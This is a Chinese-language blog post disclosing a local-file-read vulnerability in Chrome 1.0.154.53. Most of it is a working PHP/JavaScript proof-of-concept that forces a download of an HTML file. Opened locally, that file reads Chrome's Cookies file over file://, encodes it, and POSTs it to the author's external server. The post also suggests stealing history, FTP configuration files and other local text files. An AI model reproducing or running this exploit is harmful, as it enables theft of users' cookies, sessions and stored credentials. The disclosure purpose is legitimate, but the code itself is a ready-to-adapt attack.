Google Chrome使用ajax读取本地文件漏洞

作者:空虚浪子心

google的浏览器Chrome1.0.154.53(目前最新),存在ajax读取本地文件漏洞。
利用该漏洞可以读取本地文本文件,并提交出来。

而Chrome的cookie默认保存在“C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies”

Chrome的历史保存在”C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\History”

读取这个文件,然后提交,前提是文件在本地打开,但是如何欺骗用户在本地打开呢?

看代码:

<?
/*
#     Chrome 1.0.154.53 use ajax read local txt file and upload exp
#     www.inbreak.net
#     author [email protected] 2009-4-22
#     http://www.inbreak.net/kxlzxtest/testxss/a.php get cookie and save.
*/
header("Content-Disposition: attachment;filename=kxlzx.htm");
header("Content-type: application/kxlzx");
/*
#     set header, so just download html file,and open it at local.
*/
?>
<form id="form" action="http://www.inbreak.net/kxlzxtest/testxss/a.php" method="POST">
<input id="input" name="cookie" value="" type="hidden">
</form>
<script>
function doMyAjax(user)
{
var time = Math.random();
/*
the cookie at C:\Documents and Settings\kxlzx\Local Settings\Application Data\Google\Chrome\User Data\Default
and the history at C:\Documents and Settings\kxlzx\Local Settings\Application Data\Google\Chrome\User Data\History
and so on...
*/
var strPer = 'file://localhost/C:/Documents and Settings/'+user+'/Local Settings/Application Data/Google/Chrome/User Data/Default/Cookies?time='+time;

startRequest(strPer);

}

function Enshellcode(txt)
{
var url=new String(txt);
var i=0,l=0,k=0,curl="";
l= url.length;
for(;i<l;i++){
k=url.charCodeAt(i);
if(k<16)curl+="0"+k.toString(16);else curl+=k.toString(16);}
if (l%2){curl+="00";}else{curl+="0000";}
curl=curl.replace(/(..)(..)/g,"%u$2$1");
return curl;
}

var xmlHttp;
function createXMLHttp(){
if(window.XMLHttpRequest){
xmlHttp = new XMLHttpRequest();
}
else if(window.ActiveXObject){
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
}
}

function startRequest(doUrl){

createXMLHttp();

xmlHttp.onreadystatechange = handleStateChange;

xmlHttp.open("GET", doUrl, true);

xmlHttp.send(null);

}

function handleStateChange(){
if (xmlHttp.readyState == 4 ){
var strResponse = "";
setTimeout("framekxlzxPost(xmlHttp.responseText)", 3000);

}
}

function framekxlzxPost(text)
{
document.getElementById("input").value = Enshellcode(text);
document.getElementById("form").submit();
}

doMyAjax("administrator");

</script>

注意,本代码上传TXT之前,已经做了加密,为了保证文件的完整性,具体的解密,请看

http://cha88.cn/safe/glacierlk.php

选择shellcode解密

浏览器会自动下在这个html文件,保存为kxlzx.htm。

1

下载后,用户肯定会去看看下载了什么,打开htm(在本地)。

打开后,执行JS,把本地的cookie,history等(可自定义),上传到恶意用户制定地方。

POC可以根据实际情况改进。有以下几点注意:

几点说明:
1,不一定非要读取cookie,你也可以读取其他东西,比如ftp软件的ini配置文件等,只要是txt就能读取。
2,读取cookie必须预测本地用户名,不过很多人都是administrator。
3,反正ajax是异步,你可以同时调用几个方法。
4,或者你可以发送任何想要的本地TXT文件。

其实这个漏洞和我以前发的opera本地读取漏洞是一个道理的。

但是会比他严重一点,因为Chrome的cookie文件地址是固定的。

POC:
http://www.inbreak.net/kxlzxtest/testxss/Chrome.php
http://www.inbreak.net/kxlzxtest/testxss/b.php

相关日志

发表评论